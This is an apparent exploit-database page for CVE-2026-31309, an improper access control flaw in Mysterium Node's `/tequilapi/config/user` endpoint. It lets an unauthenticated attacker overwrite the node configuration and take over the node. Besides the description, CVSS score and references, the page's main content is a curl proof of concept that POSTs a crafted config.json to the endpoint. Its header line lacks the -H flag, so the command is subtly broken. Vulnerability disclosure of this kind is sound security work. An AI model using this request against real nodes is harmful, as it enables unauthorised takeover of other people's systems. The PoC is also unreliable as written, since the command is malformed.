## https://sploitus.com/exploit?id=PACKETSTORM:226144
# CVE-2026-31309: Improper Access Control in Mysterium Node before v1.36.0
Improper authorization in the `/tequilapi/config/user` endpoint of Mysterium Node from `v1.21.1-rc0` before `v1.36.0` allows an unauthenticated attacker to arbitrarily overwrite the node's configuration and achieve a full node takeover via a crafted POST request.
## CVSS
Score: 9.8 (CRITICAL)
Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
## PoC
```bash
curl -X POST \
"Content-Type: application/json" \
-d @config.json \
http://<host>:<port>/tequilapi/config/user
```
Discovered by Till Schacht.
## References
- <https://nvd.nist.gov/vuln/detail/CVE-2026-31309>
- <https://www.cve.org/CVERecord?id=CVE-2026-31309>
- <https://github.com/advisories/GHSA-p7gf-g6r8-g65h>